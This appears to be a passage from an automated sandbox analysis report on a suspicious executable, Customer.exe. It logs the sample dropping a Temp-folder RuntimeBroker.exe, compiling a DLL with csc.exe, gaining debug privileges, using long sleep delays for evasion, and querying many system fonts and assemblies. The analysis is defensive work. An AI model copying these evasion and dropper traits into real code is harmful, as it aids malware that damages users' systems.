            Source: C:\Users\user\Desktop\Customer.exeWindow / User API: threadDelayed 3623Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeWindow / User API: threadDelayed 9729Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.dllJump to dropped file
            Source: C:\Users\user\Desktop\Customer.exe TID: 7892Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe TID: 7508Thread sleep time: -11990383647911201s >= -30000sJump to behavior
            Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: RuntimeBroker.exe, 00000006.00000002.4115517152.00000000014AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllartial
            Source: Customer.exe, 00000000.00000002.1778170169.000000001D1B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Users\user\Desktop\Customer.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeMemory allocated: page read and write | page guardJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\1ogmnitn\1ogmnitn.cmdline"Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeProcess created: C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe "C:\Users\user\AppData\Local\Temp\RuntimeBroker.exe" Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6040.tmp" "c:\Users\user\AppData\Local\Temp\1ogmnitn\CSC1B46EB8E836240E48C8059BFB557429.TMP"Jump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Users\user\Desktop\Customer.exe VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Core\v4.0_4.0.0.0__b77a5c561934e089\System.Core.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Xml\v4.0_4.0.0.0__b77a5c561934e089\System.XML.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\OFFSYMSL.TTF VolumeInformationJump to behavior
            Source: C:\Users\user\Desktop\Customer.exeQueries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformationJump to behavior
